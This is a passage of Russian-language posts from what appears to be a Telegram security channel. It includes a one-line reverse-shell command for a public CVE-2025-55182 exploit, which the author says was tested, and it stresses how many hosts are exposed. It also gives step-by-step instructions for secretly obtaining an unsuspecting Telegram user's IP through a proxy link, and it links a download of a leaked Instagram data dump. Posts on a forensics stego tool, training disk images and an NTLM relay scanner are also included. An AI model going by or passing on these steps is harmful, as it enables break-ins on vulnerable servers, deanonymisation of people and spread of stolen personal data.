Канал ламера

Рабочий эксплоит Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам. Получить шелл в одну команду можно так python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234 Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает). Сейчас в интернете находится 8.7 миллионов потенциально уязвимых и...

Кстати, в продолжение темы стеганографии, я уже писал про очень интересный проект ChamelionLab в своем канале Forensictools который, наверно, один из немногих с нормальным интерфейсом и функционалом позволяет, не только искать скрытую стеганографию, но и прятать. Причем делает и то и другое - великолепно.

Нашумевшая утечка instagram: https://anonfilesnew.com/s/GlmIa9G-tI6 Канал ламера

Просто образы дисков для обучения криминалистов в извлечение данных на разных платформах.

Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик. Пошагово: 1. Поднимаем mitmproxy или другой listener 2. Пишем любой текст и указываем ссылку t.me/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random 3. Ждем, пока по ней кликнут, и сразу же получаем IP Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP п...

Новый сканер для обнаружения уязвимостей к NTLM релеям https://github.com/depthsecurity/RelayKing-Depth/ Сканирует по SMB, LDAP/S, MSSQL, HTTP/S, RPC, WinRM Находит WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + всякие PrinterBug, PetitPotam и т.п. Поддерживает аудит всего домена Составляет список таргетов для ntlmrelayx и других софтин. * Сохраняет отчет в plaintext/JSON/CSV/Markdown Есть статья в блоге: https://www.depthsecurity.com/blog/introducing-relayking-relay-to-royalty/ #s...